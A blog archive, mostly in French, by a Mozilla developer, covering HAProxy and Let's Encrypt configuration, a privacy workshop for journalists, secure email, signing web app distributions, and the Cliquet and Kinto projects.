Maintenant, grâce à Let’s Encrypt il est possible d’avoir des certificats SSL gratuits, ce qui représente un grand pas en avant pour la sécurité de nos communications.

Je viens de mettre en place un procédé (assez simple) qui permet de configurer votre serveur pour générer des certificats SSL valides avec Let’s Encrypt et le répartiteur de charge HAProxy.

Je me suis basé pour cet article sur d’autres articles, dont je vous recommande la lecture pour un complément d’information.

Validation des domaines par Let’s Encrypt

Je vous passe les détails d’installation du client de Let’s Encrypt, qui sont très bien expliqués sur leur documentation.

Une fois installé, vous allez taper une commande qui va ressembler à:

letsencrypt-auto certonly --renew-by-default
--webroot -w /home/www/letsencrypt-requests/ \
-d hurl.kinto-storage.org \
-d forums.kinto-storage.org

Le webroot est l’endroit ou les preuves de détention du domaine vont être déposées.

Lorsque les serveurs de Let’s Encrypt vont vouloir vérifier que vous êtes bien à l’origine des demandes de certificats, ils vont envoyer une requête HTTP sur http://domaine.org/.well-known/acme-challenge, ou il voudra trouver des informations qu’il aura généré via la commande letsencrypt-auto.

J’ai choisi de faire une règle dans haproxy pour diriger toutes les requêtes avec le chemin .well-known/acme-challenge vers un backend nginx qui sert des fichiers statiques (ceux contenus dans /home/www/letsencrypt-requests/).

Voici la section de la configuration de HAProxy (et la configuration complete si ça peut être utile):

frontend http
    bind 0.0.0.0:80
    mode http
    default_backend nginx_server

    acl letsencrypt_check path_beg /.well-known/acme-challenge
    use_backend letsencrypt_backend if letsencrypt_check

    redirect scheme https code 301 if !{ ssl_fc } !letsencrypt_check

backend letsencrypt_backend
    http-request set-header Host letsencrypt.requests
    dispatch 127.0.0.1:8000

Et celle de NGINX:

server {
    listen 8000;
    server_name letsencrypt.requests;
    root /home/www/letsencrypt-requests;
}

Installation des certificats dans HAProxy

Vos certificats SSL devraient être générés dans /etc/letsencrypt/live, mais ils ne sont pas au format attendu par haproxy. Rien de grave, la commande suivant convertit l’ensemble des certificats en une version compatible avec HAProxy:

cat /etc/letsencrypt/live/domaine.org/privkey.pem /etc/letsencrypt/live/domaine.org/fullchain.pem > /etc/ssl/letsencrypt/domaine.org.pem

Et ensuite dans la configuration de haproxy, pour le (nouveau) frontend https:

bind 0.0.0.0:443 ssl no-sslv3 crt /etc/ssl/letsencrypt

Faites bien attention à avoir un frontend https pour tous vos sites en HTTPS. Pour moi cela ressemble à ça.

Une fois tout ceci fait, redémarrez votre service haproxy et zou !

Automatisation

Pour automatiser un peu tout ça, j’ai choisi de faire ça comme suit:

Un fichier domaine dans letsencrypt/domains/domain.org qui contient le script letsencrypt.
Un fichier d’installation de certificats dans letsencrypt/install-certs.sh qui s’occupe d’installer les certificats déjà générés.

Et voila ! Le tout est dans un dépot github, si jamais ça peut vous servir, tant mieux !

Ateliers d’autodéfense numérique

2016-01-14T00:00:00+01:00

Il y a huit mois, je me rendais compte de l’importance du choix des outils pour faire face à la surveillance généralisée, et notamment en rapport au chiffrement des données. Une de mes envies de l’époque était l’animation d’ateliers.

Je compte donc:

Organiser des ateliers de sensibilisation aux outils de communication, envers mes proches;

Utiliser la communication chiffrée le plus souvent possible, au moins pour rendre le déchiffrement des messages plus longue, “noyer le poisson”.

— Chiffrement

J’ai mis un peu de temps à mettre le pied à l’étrier, mais je ressors finalement du premier atelier que j’ai co-animé avec geb, auprès d’un public de journalistes.

Pour cette première édition l’idée était à la fois d’aller à la rencontre d’un public que je connais mal, de leur donner des outils pour solutionner les problèmes auxquels ils font parfois face, et de me faire une idée de ce que pouvait être un atelier sur l’autodéfense numérique.

L’objectif pour ce premier atelier était de:

Échanger autour des besoins et faire ressortir des histoires ou le manque d’outillage / connaissances à posé problème, dans des situations concrètes;
Se rendre compte des “conduites à risque”, faire peur aux personnes formées pour qu’elles se rendent compte de l’état actuel des choses;
Proposer des solutions concrètes aux problèmes soulevés, ainsi que le minimum de connaissance théorique pour les appréhender.

1. Faire ressortir les problèmes

Afin de faire ressortir les problèmes, nous avons choisi de constituer des petits groupes de discussion, afin de faire des “Groupes d’Interview Mutuels”, ou “GIM”:

l’animateur invite les participants à se regrouper par trois, avec des personnes qu’on connaît moins puis invite chacun à livrer une expérience vécue en lien avec le thème de la réunion et les deux autres à poser des questions leur permettant de bien saisir ce qui a été vécu.

— «Pour s’écouter», SCOP Le Pavé.

De ces GIMs nous avons pu ressortir quelques histoires, gravitant autour de:

La protection des sources (d’information): Comment faire pour aider quelqu’un à faire “fuiter” des données depuis l’intérieur d’une entreprise ?
Le chiffrement de ses données: Comment éviter de faire “fuiter” des données importantes lors d’une perquisition de matériel ?

2. Faire peur

Un des premiers objectifs est de faire peur, afin que tout le monde se rende compte à quel point il est facile d’accéder à certaines données. Grégoire m’avait conseillé quelques petites accroches qui ont ma foi bien marché:

J’ai demandé aux présent.e.s de:

donner leur mot de passe à voix haute devant les autres: a priori personne ne le fera;
venir se connecter à leur compte email depuis mon ordinateur. J’ai piégé une personne, qui est venu pour taper son mot de passe.

Cela à été un bon moyen de parler de l’importance des traces que l’on peut laisser sur un ordinateur, et de la confiance qu’il faut avoir dans le matériel que l’on utilise, à fortiori si ce ne sont pas les vôtres.

Pour continuer à leur faire peur, après une brève explication de ce qu’est SSL nous avons montré comment il était facile de scruter le réseau à la recherche de mots de passe en clair.

3. Proposer des solutions concrêtes

Une fois que tout le monde avait pleinement pris sonscience des problématiques et n’osait plus utiliser son ordinateur ou son téléphone, on à commencé à parler de quelques solutions. Plusieurs approches étaient possibles ici, nous avons choisi de présenter quelques outils qui nous semblaient répondre aux attentes:

On a expliqué ce qu’était Tails, et comment l’utiliser et le dupliquer.
On a pu faire un tour des outils existants sur Tails, notamment autour de l’anonymisation de fichiers et la suppression effective de contenus.
Certaines personnes ont pu créer une clé tails avec la persistance de configurée.
Nous nous sommes connectés au réseau Tor et testé que nos adresses IP changeaient bien à la demande.
Nous avons utilisé CryptoCat par dessus Tor, afin de voir comment avoir une conversation confidentielle dans laquelle il est possible d’échanger des fichiers.

Retours

D’une manière générale, pour une formation de trois heures et demi, je suis assez content de l’exercice, et de l’ensemble des sujets que nous avons pu couvrir. Il y a beaucoup de place pour l’amélioration, notamment en amont (j’avais par exemple oublié d’amener avec moi suffisamment de clés USB pour utiliser Tails).

La plupart des retours qu’on a pu avoir jusqu’à maintenant sont positifs, et il y a l’envie d’aller plus loin sur l’ensemble de ces sujets.

La suite

Il y a beaucoup de sujets que nous n’avons pas abordés, ou uniquement survolés, à cause du manque de temps disponible. Idéalement, il faudrait au moins une journée entière pour couvrir quelques sujets plus en détail (on peut imaginer avoir une partie théorique le matin et une partie pratique l’après-midi par exemple).

J’ai choisi volontairement de ne pas aborder le chiffrement des messages via PGP parce que je pense que la protection que ce média propose n’est pas suffisante, mais je suis en train de revenir sur ma décision: il pourrait être utile de présenter l’outil, à minima, en insistant sur certaines de ses faiblesses.

Un compte twitter à été créé recemment autour des crypto-party à Rennes, si vous êtes interessés, allez jeter un coup d’œil!

Je n’ai pas trouvé de ressources disponibles par rapport à des plans de formation sur le sujet, j’ai donc décidé de publier les nôtres, afin de co-construire avec d’autres des plans de formation.

Ils sont pour l’instant disponibles sur Read The Docs. Tous les retours sont évidemment les bienvenus !

Le mail doit-il mourir ?

2015-11-24T00:00:00+01:00

J’utilise quotidiennement le protocole email, tant bien que mal, tout en sachant que l’ensemble de mes messages passent en clair sur le réseau pour la plupart de mes conversations, puisque trop peu de monde utilise le chiffrement des messages.

Et même si j’arrive à convaincre certains de mes proches à installer PGP, je ne suis pas satisfait du résultat: les méta-données (qui contacte qui à quel moment, et pour lui dire quoi) transitent de toute manière, elles, en clair, à la vue de tous.

Ce problème est lié directement au protocole email: il est necessaire de faire fuiter ces meta-données (au moins le destinataire) pour avoir un protocole mail fonctionnel.

Le mail répond à un besoin de communication asynchrone qui permet des conversations plus réfléchies qu’un simple chat (miaou). Il est tout à fait possible d’utiliser certaines technologies existantes afin de construire le futur de l’email, pour lequel:

Les méta-données seraient chiffrées — Il n’est pas possible de savoir qui communique avec qui, et quand;
Le chiffrement serait fort (et protégé d’une phrase de passe ?);
La fuite d’une clé de chiffrement utilisée dans un échange ne permette pas de déchiffrer l’ensemble des échanges (forward secrecy);
Il ne soit pas possible de réutiliser les données comme preuve pour incriminer l’emmeteur du message (deniability);

Avec au moins ces besoins en tête, il semble qu’une revue de l’ensemble des projets existants pointe du doigt vers pond, ou vers Signal.

Malheureusement, Pond est le projet d’une seule personne, qui veut plutôt utiliser ce code comme démonstration du concept en question.

Web distribution signing

2015-10-12T00:00:00+02:00

I’m not a crypto expert, nor pretend to be one. These are thoughts I want to share with the crypto community to actually see if any solution exists to solve this particular problem.

One often pointed flaw in web-based cryptographic applications is the fact that there is no way to trust online software distributions. Put differently, you don’t actually trust the software authors but are rather trusting the software distributors and certificate authorities (CAs).

I’ve been talking with a few folks in the past months about that and they suggested me to publish something to discuss the matter. So here I come!

The problem (Attack vectors)

Let’s try to describe a few potential attacks:

Application Authors just released a new version of their open source web crypto messaging application. An Indie Hoster installs it on their servers so a wide audience can actually use it.

Someone alters the files on Indie Hoster servers, effectively replacing them with other altered files with less security properties / a backdoor. This someone could either be an Evil Attacker which found its way trough, the Indie Hoster or a CDN which delivers the files,

Trusted Certificate Authorities (“governments” or “hacking team”) can also trick the User Agents (i.e. Firefox) into thinking they’re talking to Indie Hoster even though they’re actually talking to a different server.

Altered files are then being served to the User Agents, and Evil Attacker now has a way to actually attack the end users.

Problem Mitigation

Part of the problem is solved by the recently introduced Sub Resource Integrity (SRI). To quote them: “[it] defines a mechanism by which user agents may verify that a fetched resource has been delivered without unexpected manipulation.”.

SRI is a good start, but isn’t enough: it ensures the assets (JavaScript files, mainly) loaded from a specific HTML page are the ones the author of the HTML page intends. However, SRI doesn’t allow the User Agent to ensure the HTML page is the one he wants.

In other words, we miss a way to create trust between Application Authors and User Agents. The User-Agent currently has to trust the Certificate Authorities and the delivery (Indie Hoster).

For desktop software distribution: Crypto Experts audit the software, sign it somehow and then this signature can be checked locally during installation or runtime. It’s not automated, but at least it’s possible.

For web applications, we don’t have such a mechanism, but it should be possible. Consider the following:

App Authors publish a new version of their software; They provide a hash of each of their distributed files (including the HTML files);
Crypto Experts audit these files and sign the hashes somehow;
User Agents can chose to trust some specific Crypto Experts;
When a User Agent downloads files, it checks if they’re signed by a trusted party.

Chosing who you trust

In terms of user experience, handling certificates is hard, and that’s where the community matters. Distributions such as Tails could chose who they trust to verify the files, and issue warnings / refuse to run the application in case files aren’t verified.

But, as highligted earlier, CAs are hard to trust. A new instance of the same CA system wouldn’t make that much differences, expect the fact that distributions could ship with a set of trusted authorities (for which revocation would still need to be taken care of).

[…] users are vulnerable to MitM attacks by the authority, which can vouch for, or be coerced to vouch for, false keys. This weakness has been highlighted by recent CA scandals. Both schemes can also be attacked if the authority does not verify keys before vouching for them.

— SoK : Secure Messaging;

It seems that some other systems could allow for something more reliable:

Melara et al proposed CONIKS, using a series of chained commitments to Merkle prefix trees to build a key directory […] for which individual users can efficiently verify the consistency of their own entry in the directory without relying on a third party.

This “self- auditing log” approach makes the system partially have no auditing required (as general auditing of non-equivocation is still required) and also enables the system to be privacy preserving as the entries in the directory need not be made public. This comes at a mild bandwidth cost not reflected in our table, estimated to be about 10 kilobytes per client per day for self-auditing.

— SoK : Secure Messaging;

Now, I honestly have no idea if this thing solves the whole problem, and I’m pretty sure this design has many security problems attached to it.

However, that’s a problem I would really like to see solved one day, so here the start of the discussion, don’t hesitate to get in touch!

Addendum

It seems possible to increase the level a user has in a Web Application by adding indicators in the User-Agent. For instance, when using an application that’s actually signed by someone considered trustful by the User-Agent (or the distributor of the User-Agent), a little green icon could be presented to the User, so they know that they can be confident about this.

A bit like User-Agents do for SSL, but for the actual signature of the files being viewed.

Service de nuages : Pourquoi avons-nous fait Cliquet ?

2015-07-14T00:00:00+02:00

Cet article est repris depuis le blog « Service de Nuages » de mon équipe à Mozilla

tldr; Cliquet est un toolkit Python pour construire des APIs, qui implémente les bonnes pratiques en terme de mise en production et de protocole HTTP.

Les origines

L’objectif pour le premier trimestre 2015 était de construire un service de stockage et de synchronisation de listes de lecture.

Au démarrage du projet, nous avons tenté de rassembler toutes les bonnes pratiques et recommandations, venant de différentes équipes et surtout des derniers projets déployés.

De même, nous voulions tirer parti du protocole de Firefox Sync, robuste et éprouvé, pour la synchronisation des données «offline».

Plutôt qu’écrire un énième article de blog, nous avons préféré les rassembler dans ce qu’on a appellé «un protocole».

Comme pour l’architecture envisagée nous avions deux projets à construire, qui devaient obéir globalement à ces mêmes règles, nous avons décidé de mettre en commun l’implémentation de ce protocole et de ces bonnes pratiques dans un «toolkit».

Cliquet est né.

Les intentions

Quelle structure JSON pour mon API ? Quelle syntaxe pour filtrer la liste via la querystring ? Comment gérer les écritures concurrentes ? Et synchroniser les données dans mon application cliente ?

Désormais, quand un projet souhaite bénéficier d’une API REST pour stocker et consommer des données, il est possible d’utiliser le protocole HTTP proposé et de se concentrer sur l’essentiel. Cela vaut aussi pour les clients, où la majorité du code d’interaction avec le serveur est réutilisable.

Comment pouvons-nous vérifier que le service est opérationnel ? Quels indicateurs StatsD ? Est-ce que Sentry est bien configuré ? Comment déployer une nouvelle version sans casser les applications clientes ?

Comme Cliquet fournit tout ce qui est nécessaire pour être conforme avec les exigences de la mise en production, le passage du prototype au service opérationnel est très rapide ! De base le service répondra aux attentes en terme supervision, configuration, déploiement et dépréciation de version. Et si celles-ci évoluent, il suffira de faire évoluer le toolkit.

Quel backend de stockage pour des documents JSON ? Comment faire si l’équipe de production impose PostgreSQL ? Et si on voulait passer à Redis ou en mémoire pour lancer les tests ?

En terme d’implémentation, nous avons choisi de fournir des abstractions. En effet, nous avions deux services dont le coeur consistait à exposer un CRUD en REST, persistant des données JSON dans un backend. Comme Pyramid et Cornice ne fournissent rien de tout prêt pour ça, nous avons voulu introduire des classes de bases pour abstraire les notions de resource REST et de backend de stockage.

Dans le but de tout rendre optionnel et «pluggable», tout est configurable depuis le fichier .ini de l’application. Ainsi tous les projets qui utilisent le toolkit se déploieront de la même manière : seuls quelques éléments de configuration les distingueront.

Le protocole

Est-ce suffisant de parler d’«API REST» ? Est-ce bien nécessaire de relire la spec HTTP à chaque fois ? Pourquoi réinventer un protocole complet à chaque fois ?

Quand nous développons un (micro)service Web, nous dépensons généralement beaucoup trop d’énergie à (re)faire des choix (arbitraires).

Nul besoin de lister ici tout ce qui concerne la dimension de la spécification HTTP pure, qui nous impose le format des headers, le support de CORS, la négocation de contenus (types mime), la différence entre authentification et autorisation, la cohérence des code status…

Les choix principaux du protocole concernent surtout :

Les resources REST : Les deux URLs d’une resource (pour la collection et les enregistrements) acceptent des verbes et des headers précis.
Les formats : le format et la structure JSON des réponses est imposé, ainsi que la pagination des listes ou la syntaxe pour filtrer/trier les resources via la querystring.
Les timestamps : un numéro de révision qui s’incrémente à chaque opération d’écriture sur une collection d’enregistrements.
La synchronisation : une série de leviers pour récupérer et renvoyer des changements sur les données, sans perte ni collision, en utilisant les timestamps.
Les permissions : les droits d’un utilisateur sur une collection ou un enregistrement (encore frais et sur le point d’être documenté) [1].
Opérations par lot: une URL qui permet d’envoyer une série de requêtes décrites en JSON et d’obtenir les réponses respectives.

Dans la dimension opérationnelle du protocole, on trouve :

La gestion de version : cohabitation de plusieurs versions en production, avec alertes dans les entêtes pour la fin de vie des anciennes versions.
Le report des requêtes : entêtes interprétées par les clients, activées en cas de maintenance ou de surchage, pour ménager le serveur.
Le canal d’erreurs : toutes les erreurs renvoyées par le serveur ont le même format JSON et ont un numéro précis.
Les utilitaires : URLs diverses pour répondre aux besoins exprimés par l’équipe d’administrateurs (monitoring, metadonnées, paramètres publiques).

Ce protocole est une compilation des bonnes pratiques pour les APIs HTTP (c’est notre métier !), des conseils des administrateurs système dont c’est le métier de mettre à disposition des services pour des millions d’utilisateurs et des retours d’expérience de l’équipe de Firefox Sync pour la gestion de la concurrence et de l’«offline-first».

Il est documenté en détail.

Dans un monde idéal, ce protocole serait versionné, et formalisé dans une RFC. En rêve, il existerait même plusieurs implémentations avec des codes différentes (Python, Go, Node, etc.). [2]

[1]	Voir notre article dédié sur les permissions

[2]	Rappel: nous sommes une toute petite équipe !

Le toolkit

Choix techniques

Cliquet implémente le protocole en Python (2.7, 3.4+, pypy), avec Pyramid [3].

Pyramid est un framework Web qui va prendre en charge tout la partie HTTP, et qui s’avère pertinent aussi bien pour des petits projets que des plus ambitieux.

Cornice est une extension de Pyramid, écrite en partie par Alexis et Tarek, qui permet d’éviter d’écrire tout le code boilerplate quand on construit une API REST avec Pyramid.

Avec Cornice, on évite de réécrire à chaque fois le code qui va cabler les verbes HTTP aux méthodes, valider les entêtes, choisir le sérialiseur en fonction des entêtes de négociation de contenus, renvoyer les codes HTTP rigoureux, gérer les entêtes CORS, fournir la validation JSON à partir de schémas…

Cliquet utilise les deux précédents pour implémenter le protocole et fournir des abstractions, mais on a toujours Pyramid et Cornice sous la main pour aller au delà de ce qui est proposé !

[3]	Au tout début nous avons commencé une implémentation avec Python-Eve (Flask), mais n’étions pas satisfaits de l’approche pour la configuration de l’API. En particulier du côté magique.

Concepts

Bien évidemment, les concepts du toolkit reflètent ceux du protocole mais il y a des éléments supplémentaires:

Les backends : abstractions pour le stockage, le cache et les permissions (ex. PostgreSQL, Redis, en-mémoire, …)
La supervision : logging JSON et indicateurs temps-réel (StatsD) pour suivre les performances et la santé du service.
La configuration : chargement de la configuration depuis les variables d’environnement et le fichier .ini
La flexibilité : dés/activation ou substitution de la majorité des composants depuis la configuration.
Le profiling : utilitaires de développement pour trouver les goulets d’étranglement.

Proportionnellement, l’implémentation du protocole pour les resources REST est la plus volumineuse dans le code source de Cliquet. Cependant, comme nous l’avons décrit plus haut, Cliquet fournit tout un ensemble d’outillage et de bonnes pratiques, et reste donc tout à fait pertinent pour n’importe quel type d’API, même sans manipulation de données !

L’objectif de la boîte à outils est de faire en sorte qu’un développeur puisse constuire une application simplement, en étant sûr qu’elle réponde aux exigeances de la mise en production, tout en ayant la possibilité de remplacer certaines parties au fur et à mesure que ses besoins se précisent.

Par exemple, la persistence fournie par défault est schemaless (e.g JSONB), mais rien n’empêcherait d’implémenter le stockage dans un modèle relationnel.

Comme les composants peuvent être remplacés depuis la configuration, il est tout à fait possible d’étendre Cliquet avec des notions métiers ou des codes exotiques ! Nous avons posé quelques idées dans la documentation de l’éco-système.

Dans les prochaines semaines, nous allons introduire la notion d’«évènements» (ou signaux), qui permettraient aux extensions de s’interfacer beaucoup plus proprement.

Nous attachons beaucoup d’importance à la clareté du code, la pertinence des patterns, des tests et de la documentation. Si vous avez des commentaires, des critiques ou des interrogations, n’hésitez pas à nous en faire part !

Cliquet, à l’action.

Nous avons écrit un guide de démarrage, qui n’exige pas de connaître Pyramid.

Pour illustrer la simplicité et les concepts, voici quelques extraits !

Étape 1

Activer Cliquet:

import cliquet
from pyramid.config import Configurator

def main(global_config, **settings):
    config = Configurator(settings=settings)

    cliquet.initialize(config, '1.0')
    return config.make_wsgi_app()

À partir de là, la plupart des outils de Cliquet sont activés et accessibles.

Par exemple, les URLs hello (/v1/) ou supervision (/v1/__heartbeat__). Mais aussi les backends de stockage, de cache, etc. qu’il est possible d’utiliser dans des vues classiques Pyramid ou Cornice.

Étape 2

Ajouter des vues:

def main(global_config, **settings):
    config = Configurator(settings=settings)

    cliquet.initialize(config, '1.0')
    config.scan("myproject.views")
    return config.make_wsgi_app()

Pour définir des resources CRUD, il faut commencer par définir un schéma, avec Colander, et ensuite déclarer une resource:

from cliquet import resource, schema

class BookmarkSchema(schema.ResourceSchema):
    url = schema.URL()

@resource.register()
class Bookmark(resource.BaseResource):
    mapping = BookmarkSchema()

Désormais, la resource CRUD est disponible sur /v1/bookmarks, avec toutes les fonctionnalités de synchronisation, filtrage, tri, pagination, timestamp, etc. De base les enregistrements sont privés, par utilisateur.

$ http GET "http://localhost:8000/v1/bookmarks"
HTTP/1.1 200 OK
...
{
    "data": [
        {
            "url": "http://cliquet.readthedocs.org",
            "id": "cc103eb5-0c80-40ec-b6f5-dad12e7d975e",
            "last_modified": 1437034418940,
        }
    ]
}

Étape 3

Évidemment, il est possible choisir les URLS, les verbes HTTP supportés, de modifier des champs avant l’enregistrement, etc.

@resource.register(collection_path='/user/bookmarks',
                   record_path='/user/bookmarks/{{id}}',
                   collection_methods=('GET',))
class Bookmark(resource.BaseResource):
    mapping = BookmarkSchema()

    def process_record(self, new, old=None):
        if old is not None and new['device'] != old['device']:
            device = self.request.headers.get('User-Agent')
            new['device'] = device
        return new

Plus d’infos dans la documentation dédiée !

Note

Il est possible de définir des resources sans validation de schema. Voir le code source de Kinto.

Étape 4 (optionelle)

Utiliser les abstractions de Cliquet dans une vue Cornice.

Par exemple, une vue qui utilise le backend de stockage:

from cliquet import Service

score = Service(name="score",
                path='/score/{game}',
                description="Store game score")

@score.post(schema=ScoreSchema)
def post_score(request):
    collection_id = 'scores-' + request.match_dict['game']
    user_id = request.authenticated_userid
    value = request.validated  # c.f. Cornice.

    storage = request.registry.storage
    record = storage.create(collection_id, user_id, value)
    return record

Vos retours

N’hésitez pas à nous faire part de vos retours ! Cela vous a donné envie d’essayer ? Vous connaissez un outil similaire ? Y-a-t-il des points qui ne sont pas clairs ? Manque de cas d’utilisation concrets ? Certains aspects mal pensés ? Trop contraignants ? Trop de magie ? Overkill ?

Nous prenons tout.

Points faibles

Nous sommes très fiers de ce que nous avons construit, en relativement peu de temps. Et comme nous l’exposions dans l’article précédent (plus accessible), il y a du potentiel !

Cependant, nous sommes conscients d’un certain nombre de points qui peuvent être vus comme des faiblesses.

La documentation d’API : actuellement, nous n’avons pas de solution pour qu’un projet qui utilise Cliquet puisse intégrer facilement toute la documentation de l’API obtenue.
La documentation : il est très difficile d’organiser la documentation, surtout quand le public visé est aussi bien débutant qu’expérimenté. Nous sommes probablement victimes du «curse of knowledge».
Le protocole : on sent bien qu’on va devoir versionner le protocole. Au moins pour le désolidariser des versions de Cliquet, si on veut aller au bout de la philosophie et de l’éco-système.
Le conservatisme : Nous aimons la stabilité et la robustesse. Mais surtout nous ne sommes pas tout seuls et devons nous plier aux contraintes de la mise en production ! Cependant, nous avons très envie de faire de l’async avec Python 3 !
Publication de versions : le revers de la médaille de la factorisation. Il arrive qu’on préfère faire évoluer le toolkit (e.g. ajouter une option) pour un point précis d’un projet. En conséquence, on doit souvent releaser les projets en cascade.

Quelques questions courantes

Pourquoi Python ?

On prend beaucoup de plaisir à écrire du Python, et le calendrier annoncé initialement était très serré: pas question de tituber avec une code mal maitrisée !

Et puis, après avoir passé près d’un an sur un projet Node.js, l’équipe avait bien envie de refaire du Python.

Pourquoi pas Django ?

On y a pensé, surtout parce qu’il y a plusieurs fans de Django REST Framework dans l’équipe.

On l’a écarté principalement au profit de la légèreté et la modularité de Pyramid.

Pourquoi pas avec un framework asynchrone en Python 3+ ?

Pour l’instant nos administrateurs système nous imposent des déploiements en Python 2.7, à notre grand désarroi /o\

Pour Reading List, nous avions activé gevent.

Puisque l’approche consiste à implémenter un protocole bien déterminé, nous n’excluons pas un jour d’écrire un Cliquet en aiohttp ou Go si cela s’avèrerait pertinent.

Pourquoi pas JSON-API ?

Comme nous l’expliquions au retour des APIdays, JSON-API est une spécification qui rejoint plusieurs de nos intentions.

Quand nous avons commencé le protocole, nous ne connaissions pas JSON-API. Pour l’instant, comme notre proposition est beaucoup plus minimaliste, le rapprochement n’a pas dépassé le stade de la discussion.

Est-ce que Cliquet est un framework REST pour Pyramid ?

Non.

Au delà des classes de resources CRUD de Cliquet, qui implémentent un protocole bien précis, il faut utiliser Cornice ou Pyramid directement.

Est-ce que Cliquet est suffisamment générique pour des projets hors Mozilla ?

Premièrement, nous faisons en sorte que tout soit contrôlable depuis la configuration .ini pour permettre la dés/activation ou substitution des composants.

Si le protocole HTTP/JSON des resources CRUD vous satisfait, alors Cliquet est probablement le plus court chemin pour construire une application qui tient la route.

Mais l’utilisation des resources CRUD est facultative, donc Cliquet reste pertinent si les bonnes pratiques en terme de mise en production ou les abstractions fournies vous paraissent valables !

Cliquet reste un moyen simple d’aller très vite pour mettre sur pied une application Pyramid/Cornice.

Est-ce que les resources JSON supporte les modèles relationnels complexes ?

La couche de persistence fournie est très simple, et devrait répondre à la majorité des cas d’utilisation où les données n’ont pas de relations.

En revanche, il est tout à fait possible de bénéficier de tous les aspects du protocole en utilisant une classe Collection maison, qui se chargerait elle de manipuler les relations.

Le besoin de relations pourrait être un bon prétexte pour implémenter le protocole avec Django REST Framework :)

Est-il possible de faire ci ou ça avec Cliquet ?

Nous aimerions collecter des besoins pour écrire un ensemble de «recettes/tutoriels». Mais pour ne pas travailler dans le vide, nous aimerions connaitre vos idées ! (ex. brancher l’authentification Github, changer le format du logging JSON, stocker des données cartographiques, …)

Est-ce que Cliquet peut manipuler des fichiers ?

Nous l’envisageons, mais pour l’instant nous attendons que le besoin survienne en interne pour se lancer.

Si c’est le cas, le protocole utilisé sera Remote Storage, afin notamment de s’intégrer dans l’éco-système grandissant.

Est-ce que la fonctionnalité X va être implémentée ?

Cliquet est déjà bien garni. Plutôt qu’implémenter la fonctionnalité X, il y a de grandes chances que nous agissions pour s’assurer que les abstractions et les mécanismes d’extension fournis permettent de l’implémenter sous forme d’extension.

Service de nuages : Perspectives pour l’été

2015-07-07T00:00:00+02:00

Cet article est repris depuis le blog « Service de Nuages » de mon équipe à Mozilla

Mozilla a pour coutume d’organiser régulièrement des semaines de travail où tous les employés sont réunis physiquement. Pour cette dernière édition, nous avons pu retrouver nos collègues du monde entier à Whistler, en Colombie Britannique au Canada !

Ce fût l’occasion pour notre équipe de se retrouver, et surtout de partager notre vision et nos idées dans le domaine du stockage, afin de collecter des cas d’utilisation pour notre solution Kinto.

Dans cet article, nous passons en revue les pistes que nous avons pour les prochains mois.

Ateliers et promotion

Nicolas a présenté Kinto.js dans un atelier dédié, avec comme support de présentation le tutorial d’introduction.

L’application résultante, pourtant toute simple, permet d’appréhender les concepts de synchronisation de Kinto. Le tout sans installation prélable, puisque Rémy a mis en place un serveur de dev effacé tous les jours.

Nous avions mis un point d’honneur à faire du Vanilla.JS, déjà pour éviter les combats de clochers autour des frameworks, mais aussi pour mettre en évidence qu’avec HTML5 et ES6, on n’était plus aussi démunis qu’il y a quelques années.

Ce petit atelier nous a permis de nous rendre compte qu’on avait encore de grosses lacunes en terme de documentation, surtout en ce qui concerne l’éco-système et la vision globale des projets (Kinto, Kinto.js, Cliquet, …). Nous allons donc faire de notre mieux pour combler ce manque.

Mozilla Payments

Comme décrit précédemment, nous avons mis en place un système de permissions pour répondre aux besoins de suivi des paiements et abonnements.

Pour ce projet, Kinto sera utilisé depuis une application Django, via un client Python.

Maintenant que les développements ont été livrés, il faut transformer l’essai, réussir l’intégration, l’hébergement et la montée en puissance. La solution doit être livrée à la fin de l’année.

À venir

Nous aimerions en profiter pour implémenter une fonctionnalité qui nous tient à coeur : la construction de la liste des enregistrements accessibles en lecture sur une collection partagée.

Firefox OS et stockage

Nous avons eu beaucoup d’échanges avec l’équipe de Firefox OS, avec qui nous avions déjà eu l’occasion de collaborer, pour le serveur d’identification BrowserID par SMS et pour Firefox Hello.

In-App sync

Kinto, la solution simple promue pour la synchronisation de données dans les applications Firefox OS ? La classe ! C’est ce qu’on avait en tête depuis longtemps, déjà à l’époque avec Daybed. Voici donc une belle opportunité à saisir !

Il va falloir expliciter les limitations et hypothèses simplificatrices de notre solution, surtout en termes de gestion de la concurrence. Nous sommes persuadés que ça colle avec la plupart des besoins, mais il ne faudrait pas décevoir :)

Le fait que Dale, un des auteurs de PouchDB et Michiel de Jong, un des auteurs de Remote Storage, nous aient encouragés sur nos premiers pas nous a bien motivé !

Cut the Rope

Kinto devrait être mis à profit pour synchroniser les paramètres et les scores du jeu. Un premier exercice et une première vitrine sympas !

« SyncTo »

Firefox Sync est la solution qui permet de synchroniser les données de Firefox (favoris, extensions, historique, complétion des formulaires, mots de passe, …) entre plusieurs périphériques, de manière chiffrée.

L’implémentation du client en JavaScript est relativement complexe et date un peu maintenant. Le code existant n’est pas vraiment portable dans Firefox OS et les tentatives de réécriture n’ont pas abouti.

Nous souhaitons implémenter un pont entre Kinto et Firefox Sync, de manière à pouvoir utiliser le client Kinto.js, plus simple et plus moderne, pour récupérer les contenus et les stocker dans IndexedDB. Le delta à implémenter côté serveur est faible car nous nous étions inspirés du protocole déjà éprouvé de Sync. Côté client, il s’agira surtout de câbler l’authentification BrowserId et la Crypto.

Alexis a sauté sur l’occasion pour commencer l’écriture d’un client python pour Firefox Sync, qui servira de brique de base pour l’écriture du service.

Cloud Storage

Eden Chuang et Sean Lee ont présenté les avancées sur l’intégration de services de stockages distants (DropBox, Baidu Yun) dans Firefox OS. Actuellement, leur preuve de concept repose sur FUSE.

Nous avons évidemment en tête d’introduire la notion de fichiers attachés dans Kinto, en implémentant la specification *Remote Storage*, mais pour l’instant les cas d’utilisations ne se sont pas encore présentés officiellement.

À venir

Nous serons probablement amenés à introduire la gestion de la concurrence dans le client JS, en complément de ce qui a été fait sur le serveur, pour permettre les écritures simultanées et synchronisation en tâche de fond.

Nous sommes par ailleurs perpétuellement preneurs de vos retours — et bien entendu de vos contributions — tant sur le code serveur que client !

Contenus applicatifs de Firefox

Aujourd’hui Firefox a un cycle de release de six semaines. Un des objectifs consiste à désolidariser certains contenus applicatifs de ces cycles relativement longs (ex. règles de securité, dictionnaires, traductions, …) [1].

Il s’agit de données JSON et binaire qui doivent être versionnées et synchronisées par les navigateurs (lecture seule).

Il y a plusieurs outils officiels qui existent pour gérer ça (Balrog, Shavar, …), et pour l’instant, aucun choix n’a été fait. Mais lors des conversations avec l’équipe en charge du projet, ce fût vraiment motivant de voir que même pour ce genre de besoins internes, Kinto est tout aussi pertinent !

